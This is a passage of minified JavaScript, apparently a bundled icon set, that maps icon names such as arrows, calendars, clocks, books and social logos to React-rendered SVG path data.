0-1.06l6-6Z"})),arrow_move_down_left_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M6.293 7.293A1 1 0 0 1 8 8v4h10a3 3 0 0 0 3-3V6a1 1 0 1 1 2 0v3a5 5 0 0 1-5 5H8v4a1 1 0 0 1-1.707.707l-5-5a1 1 0 0 1 0-1.414l5-5Z"})),arrow_move_down_right_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M16.617 7.076a1 1 0 0 1 1.09.217l5 5a1 1 0 0 1 0 1.414l-5 5A1 1 0 0 1 16 18v-4H6a5 5 0 0 1-5-5V6a1 1 0 0 1 2 0v3a3 3 0 0 0 3 3h10V8a1 1 0 0 1 .617-.924Z"})),arrow_move_up_left_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M21 18v-3a3 3 0 0 0-3-3H8v4a1 1 0 0 1-1.707.707l-5-5a1 1 0 0 1 0-1.414l5-5A1 1 0 0 1 8 6v4h10a5 5 0 0 1 5 5v3a1 1 0 1 1-2 0Z"})),arrow_move_up_right_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M1 18v-3a5 5 0 0 1 5-5h10V6a1 1 0 0 1 1.707-.707l5 5a1 1 0 0 1 0 1.414l-5 5A1 1 0 0 1 16 16v-4H6a3 3 0 0 0-3 3v3a1 1 0 1 1-2 0Z"})),arrow_right_forward_circle_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M12 1.25C6.063 1.25 1.25 6.063 1.25 12S6.063 22.75 12 22.75 22.75 17.937 22.75 12 17.937 1.25 12 1.25Zm1.707 6.543a1 1 0 1 0-1.414 1.414L14.086 11H7.5a1 1 0 1 0 0 2h6.586l-1.793 1.793a1 1 0 0 0 1.414 1.414l3.5-3.5a1 1 0 0 0 0-1.414l-3.5-3.5Z",clipRule:"evenodd"})),arrow_right_forward_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M11.293 2.793a1 1 0 0 1 1.414 0l8.5 8.5a1 1 0 0 1 0 1.414l-8.5 8.5a1 1 0 1 1-1.414-1.414L18.086 13H3.5a1 1 0 1 1 0-2h14.586l-6.793-6.793-.068-.076a1 1 0 0 1 .068-1.338Z"})),arrow_right_next_forward_chevron_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M8.713 5.307a.75.75 0 0 1 .817.163l6 6a.75.75 0 0 1 0 1.06l-6 6A.75.75 0 0 1 8.25 18V6a.75.75 0 0 1 .463-.693Z"})),arrow_up_dropdown_minimize_chevron_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M11.527 8.418a.75.75 0 0 1 1.004.052l6 6a.75.75 0 0 1-.53 1.28H6a.75.75 0 0 1-.531-1.28l6-6 .057-.052Z"})),arrow_up_top_left_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M5 18V6a1 1 0 0 1 1-1h12a1 1 0 1 1 0 2H8.414l10.293 10.293.068.076a1 1 0 0 1-1.406 1.406l-.076-.068L7 8.414V18a1 1 0 1 1-2 0Z"})),arrow_up_top_right_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M19 18a1 1 0 1 1-2 0V8.414L6.707 18.707a1 1 0 1 1-1.414-1.414L15.586 7H6a1 1 0 0 1 0-2h12a1 1 0 0 1 1 1v12Z"})),arrow_up_top_upward_circle_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M12 1.25C6.063 1.25 1.25 6.063 1.25 12S6.063 22.75 12 22.75 22.75 17.937 22.75 12 17.937 1.25 12 1.25Zm4.207 9.043-3.5-3.5a1 1 0 0 0-1.414 0l-3.5 3.5a1 1 0 1 0 1.414 1.414L11 9.914V16.5a1 1 0 1 0 2 0V9.914l1.793 1.793a1 1 0 0 0 1.414-1.414Z",clipRule:"evenodd"})),arrow_up_top_upward_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M11 20.5V5.914l-6.793 6.793a1 1 0 1 1-1.414-1.414l8.5-8.5.076-.068a1 1 0 0 1 1.338.068l8.5 8.5.068.076a1 1 0 0 1-1.406 1.406l-.076-.068L13 5.914V20.5a1 1 0 1 1-2 0Z"})),at_a_mail_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M12 7c1.126 0 2.164.372 3 1a1 1 0 1 1 2 0v7a1 1 0 0 0 1 1 3 3 0 0 0 3-3v-1a9 9 0 1 0-9 9c1.64 0 3.176-.438 4.499-1.203a1 1 0 0 1 1.002 1.73A10.955 10.955 0 0 1 12 23C5.925 23 1 18.075 1 12S5.925 1 12 1s11 4.925 11 11v1a5 5 0 0 1-5 5 3.002 3.002 0 0 1-2.865-2.106A5 5 0 1 1 12 7Zm-3 5a3 3 0 1 0 6 0 3 3 0 0 0-6 0Z"})),author_user_human_1_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M16.75 7a4.75 4.75 0 1 1-9.5 0 4.75 4.75 0 0 1 9.5 0Zm3.5 13.533c0 .672-.545 1.217-1.217 1.217H4.967a1.217 1.217 0 0 1-1.217-1.217 7.283 7.283 0 0 1 7.283-7.283h1.934a7.283 7.283 0 0 1 7.283 7.283Z"})),author_user_human_2_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M7.5 8a4.5 4.5 0 0 0 2.43 3.996A8.754 8.754 0 0 0 3.25 20.5c0 .414.336.75.75.75h16a.75.75 0 0 0 .75-.75 8.754 8.754 0 0 0-6.68-8.504A4.5 4.5 0 1 0 7.5 8Z"})),author_user_human_3_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M16.75 7a4.75 4.75 0 1 1-9.5 0 4.75 4.75 0 0 1 9.5 0Zm4 14a.75.75 0 0 1-.75.75H4a.75.75 0 0 1-.75-.75v-3A4.75 4.75 0 0 1 8 13.25h8A4.75 4.75 0 0 1 20.75 18v3Z"})),author_user_human_4_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M16.75 7a4.75 4.75 0 1 1-9.5 0 4.75 4.75 0 0 1 9.5 0ZM12 12.75c3.518 0 6.62 1.696 8.337 4.088.411.573.6 1.197.568 1.816a2.84 2.84 0 0 1-.645 1.626c-.723.902-1.951 1.47-3.26 1.47H7c-1.308 0-2.537-.568-3.26-1.47a2.838 2.838 0 0 1-.644-1.626c-.032-.62.156-1.243.568-1.816C5.38 14.446 8.483 12.75 12 12.75Z"})),book_reading_time_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M14.5 1.25a6.25 6.25 0 0 1 4.25 10.83V16a.75.75 0 0 1-.75.75H7a2.25 2.25 0 0 0 0 4.5h11a.75.75 0 0 1 0 1.5H7A3.75 3.75 0 0 1 3.25 19V7A3.75 3.75 0 0 1 7 3.25h2.92c1.141-1.23 2.77-2 4.58-2ZM7 4.75A2.25 2.25 0 0 0 4.75 7v9A3.733 3.733 0 0 1 7 15.25h10.25v-2.137A6.25 6.25 0 0 1 8.887 4.75H7Zm7.5-.5a.75.75 0 0 0-.75.75v3a.75.75 0 0 0 .415.67l2 1a.75.75 0 0 0 .67-1.34l-1.585-.794V5a.75.75 0 0 0-.75-.75Z",clipRule:"evenodd"}),(0,o.createElement)("path",{d:"M16 19.75a.75.75 0 0 0 0-1.5H7a.75.75 0 0 0 0 1.5h9Z"})),book_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M7 1.25A3.75 3.75 0 0 0 3.25 5v14A3.75 3.75 0 0 0 7 22.75h13a.75.75 0 0 0 .75-.75V8a.75.75 0 0 0-.75-.75H7a2.25 2.25 0 0 1 0-4.5h13a.75.75 0 0 0 0-1.5H7Zm6.75 17.25v-1.75h-3.5v1.75a.75.75 0 0 1-1.5 0v-3.092c0-.74.22-1.464.63-2.08l1.219-1.828a1.684 1.684 0 0 1 2.802 0l1.22 1.828c.41.616.629 1.34.629 2.08V18.5a.75.75 0 0 1-1.5 0Z",clipRule:"evenodd"}),(0,o.createElement)("path",{fillRule:"evenodd",d:"M11.847 12.332a.184.184 0 0 1 .306 0l1.22 1.828c.216.326.344.701.371 1.09h-3.488a2.25 2.25 0 0 1 .372-1.09l1.219-1.828Z",clipRule:"evenodd"}),(0,o.createElement)("path",{d:"M17 4.25a.75.75 0 0 1 0 1.5H7a.75.75 0 0 1 0-1.5h10Z"})),calendar_date_1_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M8.01 12.5a1 1 0 1 1 0 2H8a1 1 0 1 1 0-2h.01Zm0 3.5a1 1 0 1 1 0 2H8a1 1 0 1 1 0-2h.01Zm4-3.5a1 1 0 1 1 0 2H12a1 1 0 1 1 0-2h.01Zm0 3.5a1 1 0 1 1 0 2H12a1 1 0 1 1 0-2h.01Zm4-3.5a1 1 0 1 1 0 2H16a1 1 0 1 1 0-2h.01Zm0 3.5a1 1 0 1 1 0 2H16a1 1 0 1 1 0-2h.01Z"}),(0,o.createElement)("path",{fillRule:"evenodd",d:"M2.25 9v10.5A2.75 2.75 0 0 0 5 22.25h14a2.75 2.75 0 0 0 2.75-2.75v-14A2.75 2.75 0 0 0 19 2.75h-2V2a1 1 0 1 0-2 0v.75H9V2a1 1 0 1 0-2 0v.75H5A2.75 2.75 0 0 0 2.25 5.5V9Zm18 .75H3.75v9.75c0 .69.56 1.25 1.25 1.25h14c.69 0 1.25-.56 1.25-1.25V9.75Z",clipRule:"evenodd"})),calendar_date_2_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M15.76 1.376a.751.751 0 0 1 1.48.247l-.104.626H21a.751.751 0 0 1 .749.75h.002v16A2.75 2.75 0 0 1 19 21.75H8a2.75 2.75 0 0 1-2.736-2.468L5.251 19v-.75H3.314a1.75 1.75 0 0 1-1.688-2.216L5.278 2.8l.043-.117A.75.75 0 0 1 6 2.25h3.614l.145-.873a.751.751 0 0 1 1.48.247l-.104.626h1.479l.145-.873a.751.751 0 0 1 1.48.247l-.104.626h1.479l.145-.873Zm2.368 14.855a2.751 2.751 0 0 1-2.65 2.018H6.75V19l.006.128A1.25 1.25 0 0 0 8 20.251h11c.69 0 1.25-.56 1.25-1.25V8.538l-2.123 7.693Zm-5.152-8.812a.75.75 0 0 0-.81-.09l-2 1a.75.75 0 0 0 .67 1.341l.5-.25-.909 3.33h-.926a.75.75 0 0 0 0 1.5h3a.75.75 0 0 0 0-1.5h-.518l1.241-4.553a.75.75 0 0 0-.248-.778Z",clipRule:"evenodd"})),calendar_date_3_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M17 2.75V2a1 1 0 1 0-2 0v.75H9V2a1 1 0 1 0-2 0v.75H5A2.75 2.75 0 0 0 2.25 5.5v14A2.75 2.75 0 0 0 5 22.25h14a2.75 2.75 0 0 0 2.75-2.75v-14A2.75 2.75 0 0 0 19 2.75h-2Zm-13.25 7h16.5v9.75c0 .69-.56 1.25-1.25 1.25H5c-.69 0-1.25-.56-1.25-1.25V9.75Z"})),calendar_date_4_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M17.5 2a1 1 0 1 0-2 0v.75H13V2a1 1 0 1 0-2 0v.75H8.5V2a1 1 0 0 0-2 0v.75H5A2.75 2.75 0 0 0 2.25 5.5v14A2.75 2.75 0 0 0 5 22.25h14a2.75 2.75 0 0 0 2.75-2.75v-14A2.75 2.75 0 0 0 19 2.75h-1.5V2Zm-1.49 7a1 1 0 0 1 0 2c-.553 0-1.01-.448-1.01-1s.457-1 1.01-1Zm-3 1a1 1 0 0 0-1-1c-.553 0-1.01.448-1.01 1s.457 1 1.01 1a1 1 0 0 0 1-1Zm-5-1a1 1 0 1 1 0 2C7.457 11 7 10.552 7 10s.457-1 1.01-1Zm1 4.5a1 1 0 0 0-1-1c-.553 0-1.01.448-1.01 1s.457 1 1.01 1a1 1 0 0 0 1-1Zm3-1a1 1 0 1 1 0 2c-.553 0-1.01-.448-1.01-1s.457-1 1.01-1Zm5 1a1 1 0 0 0-1-1c-.553 0-1.01.448-1.01 1s.457 1 1.01 1a1 1 0 0 0 1-1Zm-1 2.5a1 1 0 0 1 0 2c-.553 0-1.01-.448-1.01-1s.457-1 1.01-1Zm-3 1a1 1 0 0 0-1-1c-.553 0-1.01.448-1.01 1s.457 1 1.01 1a1 1 0 0 0 1-1Zm-5-1a1 1 0 1 1 0 2C7.457 18 7 17.552 7 17s.457-1 1.01-1Z",clipRule:"evenodd"})),caret_up_top_triangle_angle_arrow_upward_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M19 17.75c1.442 0 2.265-1.646 1.4-2.8l-7-9.333a1.75 1.75 0 0 0-2.8 0l-7 9.333c-.865 1.154-.042 2.8 1.4 2.8h14Z",clipRule:"evenodd"})),category_book_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M7 1.25A3.75 3.75 0 0 0 3.25 5v14A3.75 3.75 0 0 0 7 22.75h13a.75.75 0 0 0 .75-.75v-8H15v-3h5.75V8a.75.75 0 0 0-.75-.75H7a2.25 2.25 0 0 1 0-4.5h13a.75.75 0 0 0 0-1.5H7Zm3.5 13.5a.75.75 0 0 1 0 1.5h-3a.75.75 0 0 1 0-1.5h3Zm.75 3.75a.75.75 0 0 0-.75-.75h-3a.75.75 0 0 0 0 1.5h3a.75.75 0 0 0 .75-.75Z",clipRule:"evenodd"}),(0,o.createElement)("path",{d:"M17 4.25a.75.75 0 0 1 0 1.5H7a.75.75 0 0 1 0-1.5h10Z"})),category_file_documents_1_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M21 2.25a.75.75 0 0 1 .75.75v6.5a.75.75 0 0 1-.22.53l-1.28 1.28V18a.75.75 0 0 1-.75.75h-2.25V21a.75.75 0 0 1-.75.75H3a.75.75 0 0 1-.75-.75V5c0-.027.001-.053.004-.08A2.748 2.748 0 0 1 5 2.25h16ZM5 3.75a1.25 1.25 0 1 0 0 2.5h11.5a.75.75 0 0 1 .75.75v10.25h1.5V11c0-.199.08-.39.22-.53l1.28-1.28V3.75H5Zm5.25 10.75a.75.75 0 0 0-.75-.75h-3a.75.75 0 0 0 0 1.5h3a.75.75 0 0 0 .75-.75Zm-.75 2.25a.75.75 0 0 1 0 1.5h-3a.75.75 0 0 1 0-1.5h3Z",clipRule:"evenodd"})),category_file_documents_2_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M22.75 19A1.75 1.75 0 0 1 21 20.75H4A2.75 2.75 0 0 1 1.25 18V6A2.75 2.75 0 0 1 4 3.25h11.172c.73 0 1.429.29 1.944.806l2.195 2.194H21c.966 0 1.75.784 1.75 1.75v11Zm-20-1c0 .69.56 1.25 1.25 1.25h.25V8c0-.966.784-1.75 1.75-1.75h11.19l-1.134-1.134a1.25 1.25 0 0 0-.884-.366H4c-.69 0-1.25.56-1.25 1.25v12Z"})),category_file_documents_3_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M19 3.25c.966 0 1.75.784 1.75 1.75v1.25H21c.966 0 1.75.784 1.75 1.75v11A1.75 1.75 0 0 1 21 20.75H6A1.75 1.75 0 0 1 4.25 19v-.25H3A1.75 1.75 0 0 1 1.25 17V8c0-.966.784-1.75 1.75-1.75h8.586a.25.25 0 0 0 .177-.073l2.414-2.414a1.75 1.75 0 0 1 1.237-.513H19Zm-3.586 1.5a.25.25 0 0 0-.177.073l-2.414 2.414a1.75 1.75 0 0 1-1.237.513H3a.25.25 0 0 0-.25.25v9c0 .138.112.25.25.25h1.25V11c0-.966.784-1.75 1.75-1.75h7.586a.25.25 0 0 0 .177-.073l2.414-2.414a1.75 1.75 0 0 1 1.237-.513h1.836V5a.25.25 0 0 0-.25-.25h-3.586Z",clipRule:"evenodd"})),category_file_documents_4_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M8.586 3.25c.464 0 .91.185 1.237.513L11.81 5.75H18a2.75 2.75 0 0 1 2.75 2.75v1.75H22a.75.75 0 0 1 .686 1.055l-4 9a.75.75 0 0 1-.686.445H2a.75.75 0 0 1-.749-.75L1.25 5c0-.966.784-1.75 1.75-1.75h5.586ZM3 4.75a.25.25 0 0 0-.25.25v11.465l2.564-5.77.052-.096A.75.75 0 0 1 6 10.25h13.25V8.5c0-.69-.56-1.25-1.25-1.25H8a.75.75 0 0 1 0-1.5h1.69l-.927-.927a.25.25 0 0 0-.177-.073H3Z",clipRule:"evenodd"})),clock_reading_time_1_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M12 22.75c5.937 0 10.75-4.813 10.75-10.75S17.937 1.25 12 1.25 1.25 6.063 1.25 12 6.063 22.75 12 22.75ZM11 6a1 1 0 1 1 2 0v5.382l3.447 1.723.09.051a1 1 0 0 1-.89 1.78l-.094-.041-4-2A1 1 0 0 1 11 12V6Z",clipRule:"evenodd"})),clock_reading_time_2_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M11 2.5V1.296A10.753 10.753 0 0 0 1.296 11H2.5a1 1 0 1 1 0 2H1.296A10.753 10.753 0 0 0 11 22.704V21.5a1 1 0 1 1 2 0v1.204A10.753 10.753 0 0 0 22.704 13H21.5a1 1 0 1 1 0-2h1.204A10.753 10.753 0 0 0 13 1.296V2.5a1 1 0 1 1-2 0Zm5.707 4.793a1 1 0 0 0-1.414 0L12 10.586l-1.793-1.793-.076-.068a1 1 0 0 0-1.338 1.482L10.586 12l-.793.793a1 1 0 1 0 1.414 1.414l.793-.793.793.793.076.068a1 1 0 0 0 1.406-1.406l-.068-.076-.793-.793 3.293-3.293a1 1 0 0 0 0-1.414Z",clipRule:"evenodd"})),clock_reading_time_3_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M15.5 1.25a7.25 7.25 0 0 1 7.25 7.25 7.222 7.222 0 0 1-2.001 4.997L20.75 16A6.75 6.75 0 0 1 14 22.75H2a.75.75 0 0 1-.75-.75v-7A6.75 6.75 0 0 1 8 8.25h.257a7.248 7.248 0 0 1 7.243-7Zm0 1.5a5.75 5.75 0 1 0 0 11.5 5.75 5.75 0 0 0 0-11.5ZM14 18.5a1 1 0 0 0-1-1H6a1 1 0 1 0 0 2h7a1 1 0 0 0 1-1Zm-5-5a1 1 0 1 1 0 2H6a1 1 0 1 1 0-2h3Z",clipRule:"evenodd"}),(0,o.createElement)("path",{d:"M14.5 5.111a1 1 0 1 1 2 0v3.3l1.485.826.087.054a1 1 0 0 1-.966 1.739l-.091-.045-2-1.111A1 1 0 0 1 14.5 9V5.11Z"})),confused_emoji_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M12 1.25C6.063 1.25 1.25 6.063 1.25 12S6.063 22.75 12 22.75 22.75 17.937 22.75 12 17.937 1.25 12 1.25ZM8.5 9a1 1 0 0 1 1 1v1.5a1 1 0 1 1-2 0V10a1 1 0 0 1 1-1Zm7 0a1 1 0 0 1 1 1v1.5a1 1 0 1 1-2 0V10a1 1 0 0 1 1-1Zm-5.95 8.51c.63-.68 2.871-2.237 6.317-1.617a.75.75 0 1 0 .266-1.476c-4.02-.723-6.758 1.075-7.683 2.073a.75.75 0 1 0 1.1 1.02Z",clipRule:"evenodd"})),correct_save_check_circle_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M12 1.25C6.063 1.25 1.25 6.063 1.25 12S6.063 22.75 12 22.75 22.75 17.937 22.75 12 17.937 1.25 12 1.25Zm4.737 8.426a1 1 0 0 0-1.474-1.352l-4.794 5.23-1.762-1.761a1 1 0 0 0-1.414 1.414l2.5 2.5a1 1 0 0 0 1.444-.031l5.5-6Z",clipRule:"evenodd"})),correct_save_check_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M18.731 5.36a1 1 0 0 1 1.537 1.28l-10 12a1.001 1.001 0 0 1-1.475.067l-5-5a1 1 0 1 1 1.414-1.414l4.225 4.225 9.3-11.159Z"})),cross_close_x_minimize_circle_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M12 1.25C6.063 1.25 1.25 6.063 1.25 12S6.063 22.75 12 22.75 22.75 17.937 22.75 12 17.937 1.25 12 1.25ZM8.707 7.293a1 1 0 0 0-1.414 1.414L10.586 12l-3.293 3.293a1 1 0 1 0 1.414 1.414L12 13.414l3.293 3.293a1 1 0 0 0 1.414-1.414L13.414 12l3.293-3.293a1 1 0 0 0-1.414-1.414L12 10.586 8.707 7.293Z",clipRule:"evenodd"})),cross_x_close_minimize_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M17.293 5.293a1 1 0 1 1 1.414 1.414L13.414 12l5.293 5.293.068.076a1 1 0 0 1-1.406 1.406l-.076-.068L12 13.414l-5.293 5.293a1 1 0 1 1-1.414-1.414L10.586 12 5.293 6.707a1 1 0 1 1 1.414-1.414L12 10.586l5.293-5.293Z"})),desktop_monitor_computer_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M11 17.75H4A2.75 2.75 0 0 1 1.25 15V5A2.75 2.75 0 0 1 4 2.25h16A2.75 2.75 0 0 1 22.75 5v10A2.75 2.75 0 0 1 20 17.75h-7V20h3a1 1 0 1 1 0 2H8a1 1 0 1 1 0-2h3v-2.25Zm1.01-5.25a1 1 0 1 1 0 2c-.553 0-1.01-.448-1.01-1s.457-1 1.01-1Z",clipRule:"evenodd"})),dot_circle_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M12 1.25C6.063 1.25 1.25 6.063 1.25 12S6.063 22.75 12 22.75 22.75 17.937 22.75 12 17.937 1.25 12 1.25Z",clipRule:"evenodd"})),download_1_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M2 19v-4a1 1 0 1 1 2 0v4c0 .548.452 1 1 1h14a1 1 0 0 0 1-1v-4a1 1 0 1 1 2 0v4a3 3 0 0 1-3 3H5c-1.652 0-3-1.348-3-3Z"}),(0,o.createElement)("path",{d:"M12 1.5a1 1 0 0 0-1 1V8H7a1 1 0 0 0-.707 1.707l5 5a1 1 0 0 0 1.414 0l5-5A1 1 0 0 0 17 8h-4V2.5a1 1 0 0 0-1-1Z"})),download_2_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{fillRule:"evenodd",d:"M11.47 21.53a.75.75 0 0 0 1.06 0l2.5-2.5a.75.75 0 0 0-.53-1.28h-1.75V13a.75.75 0 0 0-1.5 0v4.75H9.5a.75.75 0 0 0-.53 1.28l2.5 2.5Z",clipRule:"evenodd"}),(0,o.createElement)("path",{fillRule:"evenodd",d:"M5.5 9.236a.865.865 0 0 0 .107-.04 3.548 3.548 0 0 1 2.123-.062 1 1 0 0 0 .54-1.925 5.583 5.583 0 0 0-1.467-.21 6 6 0 0 1 10.803 5.144 1 1 0 1 0 1.869.714c.163-.427.29-.872.38-1.33A3.081 3.081 0 0 1 21 13.936c0 1.437-.966 2.632-2.253 2.968a1 1 0 1 0 .506 1.935C21.417 18.274 23 16.286 23 13.936a5.067 5.067 0 0 0-3.032-4.656 8 8 0 0 0-15.58-1.745c-1.528.723-2.734 2.128-3.193 3.924-.806 3.156.967 6.46 4.068 7.332.189.053.378.096.568.128a1 1 0 1 0 .34-1.97 3.61 3.61 0 0 1-.367-.083c-1.983-.558-3.227-2.735-2.671-4.912.339-1.328 1.255-2.296 2.366-2.718Z",clipRule:"evenodd"})),facebook_logo_icon_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M5 2.25A2.75 2.75 0 0 0 2.25 5v14A2.75 2.75 0 0 0 5 21.75h6.412v-7.076H9.5V11.84h1.912v-1.22C11.412 7.462 12.84 6 15.94 6c.587 0 1.601.115 2.016.23V8.8a11.904 11.904 0 0 0-1.071-.035c-1.52 0-2.108.575-2.108 2.073v1.002h3.029l-.52 2.834h-2.51v7.076H19A2.75 2.75 0 0 0 21.75 19V5A2.75 2.75 0 0 0 19 2.25H5Z"})),google_logo_icon_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"m21.882 10.42-.103-.438h-9.485v4.036h5.667c-.588 2.81-3.318 4.289-5.549 4.289-1.623 0-3.333-.686-4.465-1.79a6.412 6.412 0 0 1-1.902-4.524c0-1.7.76-3.402 1.865-4.52 1.106-1.12 2.776-1.745 4.437-1.745 1.902 0 3.264 1.015 3.774 1.478l2.853-2.853c-.837-.74-3.136-2.603-6.72-2.603-2.764 0-5.414 1.065-7.352 3.007C2.99 6.669 2 9.434 2 12c0 2.566.937 5.193 2.79 7.12 1.98 2.056 4.784 3.13 7.671 3.13 2.627 0 5.117-1.035 6.892-2.913C21.098 17.488 22 14.93 22 12.249c0-1.129-.113-1.8-.118-1.829Z"})),growth_increase_up_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M21 6a1 1 0 0 1 1 1v6a1 1 0 0 1-1.706.707L18 11.414l-4.793 4.793a1 1 0 0 1-1.414 0L8.5 12.914l-4.993 4.993a1 1 0 0 1-1.414-1.414l5.7-5.7.073-.066a1 1 0 0 1 1.34.066l3.294 3.293L16.587 10l-2.293-2.293A1 1 0 0 1 15 6h6Z"})),hamicon_4_sloid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M3 3h18v3H3zm0 7.5h18v3H3v-3ZM3 18h18v3H3v-3Z"})),hamicon_5_solid:(0,o.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"currentColor",viewBox:"0 0 24 24"},(0,o.createElement)("path",{d:"M4 5a1 1 0 0 1 1-1h1a1 1 